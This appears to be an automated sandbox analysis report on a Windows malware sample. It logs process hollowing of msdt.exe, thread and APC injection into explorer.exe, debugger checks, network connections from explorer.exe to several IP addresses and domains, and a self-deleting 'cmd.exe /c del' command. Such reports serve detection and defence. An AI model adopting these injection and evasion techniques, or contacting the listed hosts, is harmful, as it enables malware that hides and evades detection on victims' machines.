          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\divpCHa0h7.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.161 80
          Source: C:\Windows\explorer.exeDomain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exeDomain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.165.34.6 80
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exeDomain query: www.floaterslaser.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 2F0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\divpCHa0h7.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3472
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000000.337048787.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000000.337351200.0000000001640000.00000002.00020000.sdmp, msdt.exe, 0000000F.00000002.520706887.00000000031D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Users\user\Desktop\divpCHa0h7.exe VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
